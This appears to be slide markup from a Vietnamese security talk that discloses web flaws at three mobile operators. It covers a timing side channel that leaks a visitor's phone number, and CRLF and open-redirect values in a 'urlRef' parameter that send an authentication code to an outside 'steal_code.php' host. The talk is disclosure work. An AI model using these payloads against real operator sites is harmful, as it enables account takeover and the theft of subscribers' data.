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TELECOM TRILOGY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MOBEEFONE - VIETTOLD - VEENAPHONE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025"/>
            <a:ext cx="8839200" cy="366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25" y="152400"/>
            <a:ext cx="58561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92200" y="59250"/>
            <a:ext cx="1560900" cy="4992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attack.html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1937200" y="368800"/>
            <a:ext cx="1402800" cy="31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675800" y="85600"/>
            <a:ext cx="2370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http://mobifone.vn/wps/PA_neo-mymobifone-por/jsp/consolidate/exec.jsp?service=bill_view_tbc&amp;msisdn=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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2059075" y="198575"/>
            <a:ext cx="108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Add &lt;img&gt; tag</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Shape 149"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6138925" y="428050"/>
            <a:ext cx="876000" cy="1639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7198275" y="636550"/>
            <a:ext cx="17124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Measure time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onerror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 event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If delta_time &lt; 600ms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→ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1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1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3768025" y="1411750"/>
            <a:ext cx="2370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http://mobifone.vn/wps/PA_neo-mymobifone-por/jsp/consolidate/exec.jsp?service=bill_view_tbc&amp;msisdn=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="11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Shape 152"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="8360077">
            <a:off x="2576351" y="1220567"/>
            <a:ext cx="639924" cy="112642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2684725" y="1635700"/>
            <a:ext cx="10833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i++</a:t>
            </a:r>
            <a:endParaRPr sz="900"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="154" name="Shape 154"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4807625" y="2370875"/>
            <a:ext cx="230400" cy="106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5038025" y="2463100"/>
            <a:ext cx="34248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Chọn ra các số có độ trả về cao hơn 600ms, sau đó check lại format của các đầu số: 01**, 09* ,089*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Tiếp tục side channel số thứ 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VIETTOLD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84400" y="4478350"/>
            <a:ext cx="7804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https://l4w.io/2017/11/svattt-2017-vong-loai-sad-book-writeup/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197750" y="34925"/>
            <a:ext cx="67509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http://apivtp.vietteltelecom.vn/myviettel.php/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authenticateWapMyViettel?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urlRef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=/myvt/</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="172" name="Shape 172"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6638875" y="594050"/>
            <a:ext cx="698700" cy="1851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278150" y="1564125"/>
            <a:ext cx="65901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https://viettel.vn/index.php/myvt/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authen?data=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="18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QXs7wu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="18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8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.6dMrylrgw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urlRef=/myvt/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7337575" y="1152475"/>
            <a:ext cx="1803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Gen </a:t>
            </a:r>
            <a:r>
              <a:rPr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authen code</a:t>
            </a:r>
            <a:endParaRPr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redirect to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43800" y="2473925"/>
            <a:ext cx="1114200" cy="1991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711150" y="3002271"/>
            <a:ext cx="5528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Kiểm tra </a:t>
            </a:r>
            <a:r>
              <a:rPr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authen code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, nếu valid -&gt; set cookie -&gt; redirect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tới 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urlRef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bằng Location header và &lt;meta&gt; redirect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611350" y="3976325"/>
            <a:ext cx="43344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Set-Cookie: vtp_session=...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Location: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/myvt/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http-equiv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="refresh"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content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="0;/myvt/"&gt;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709475" y="559800"/>
            <a:ext cx="1633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urlRef=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/myvt/ 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735825" y="915450"/>
            <a:ext cx="1758300" cy="27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2784925" y="493900"/>
            <a:ext cx="5649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GET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/index.php/myvt/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authen?data=</a:t>
            </a:r>
            <a:r>
              <a:rPr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QXs7wu....6dMrylrgw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&amp;urlRef=/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myvt/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Location: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/myvt/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http-equiv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="refresh"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content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="0;/myvt/"&gt;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63375" y="2385000"/>
            <a:ext cx="1918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urlRef=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//l4w.pw/ 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89725" y="2740650"/>
            <a:ext cx="1758300" cy="27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2738825" y="2319100"/>
            <a:ext cx="5649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GET /index.php/myvt/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authen?data=</a:t>
            </a:r>
            <a:r>
              <a:rPr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QXs7wu....6dMrylrgw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&amp;urlRef=/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myvt/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Location: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//l4w.pw/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http-equiv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="refresh"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content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="0;//l4w.pw/"&gt;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1330350" y="3786825"/>
            <a:ext cx="6065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Browser sẽ ưu ti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ên header Location trước để redirect ,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với header Location → sẽ không có Referer → Không steal được authen code.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5" y="99700"/>
            <a:ext cx="779904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319325" y="313425"/>
            <a:ext cx="28326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urlRef=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//l4w.pw/%0d%0aSet-Cookie: a=1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735825" y="915450"/>
            <a:ext cx="1758300" cy="27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3246925" y="493900"/>
            <a:ext cx="5649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GET /index.php/myvt/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authen?data=</a:t>
            </a:r>
            <a:r>
              <a:rPr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QXs7wu....6dMrylrgw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&amp;urlRef=/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myvt/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http-equiv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="refresh"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content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="0;//l4w.pw/</a:t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Set-Cookie..."&gt;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319325" y="2155950"/>
            <a:ext cx="2832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urlRef=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//l4w.pw/steal_code.php?%0d%0aBlah: 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689725" y="2740650"/>
            <a:ext cx="1758300" cy="27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151925" y="2226900"/>
            <a:ext cx="5649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GET /index.php/myvt/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authen?data=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="12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QXs7wu....6dMrylrgw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&amp;urlRef=/</a:t>
            </a:r>
            <a:r>
              <a:rPr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myvt/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Location: </a:t>
            </a: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//l4w.pw/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http-equiv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="refresh"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content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="0;//l4w.pw/steal_code.php?</a:t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C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Blah:"&gt;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330350" y="3786825"/>
            <a:ext cx="60654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Nhờ vào tính năng để chống HTTP Response Spliting… Server đã xóa đi trường Location và… vô tình tiếp tay cho attacker có thể leak referrer bằng &lt;meta&gt; tag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50" y="-72425"/>
            <a:ext cx="696469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4293925" y="2812125"/>
            <a:ext cx="3483900" cy="7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ói về gì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1469275"/>
            <a:ext cx="7688700" cy="27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❖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Nhà mạng tự detect số điện thoại khi truy cập trang chủ, app.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1400">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
            </a:b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Đòn bẫy cho attacker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Char char="➢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Client-side attack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Char char="■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XSS = Game over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Char char="■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CSRF / Click-jacking = Đổi info / topup / gửi SMS ?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Char char="❖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Vẫn còn bị các lỗi server-side cơ bản.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	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VEENAPHONE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mobile app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●"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Burp Suite Proxy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●"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Bluestacks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unito"/>
              <a:buChar char="○"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Proxy through 127.0.0.1:8080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Shape 2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Đa số request đư</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2400">
                <a:latin typeface="Nunito"/>
                <a:ea typeface="Nunito"/>
                <a:cs typeface="Nunito"/>
                <a:sym typeface="Nunito"/>
              </a:rPr>
              <a:t>ợc gửi đi dưới HTTP protocol.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Dễ dàng trong việc capture và replay.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38" y="90800"/>
            <a:ext cx="7602720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38" y="152400"/>
            <a:ext cx="7602720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25" y="391250"/>
            <a:ext cx="8839200" cy="366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472250" y="4281125"/>
            <a:ext cx="8131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More than 1 API vulnerable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050" y="607875"/>
            <a:ext cx="3017902" cy="301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896550" y="3663525"/>
            <a:ext cx="7350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Keep trying&amp;fighting hard to protect your innocent users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Peace.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613"/>
            <a:ext cx="8839202" cy="37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MOBEEFONE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-209850"/>
            <a:ext cx="84677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2476250" y="2766050"/>
            <a:ext cx="4662600" cy="28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731949" y="4083200"/>
            <a:ext cx="6151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Side channel - Timing attack</a:t>
            </a:r>
            <a:endParaRPr b="1"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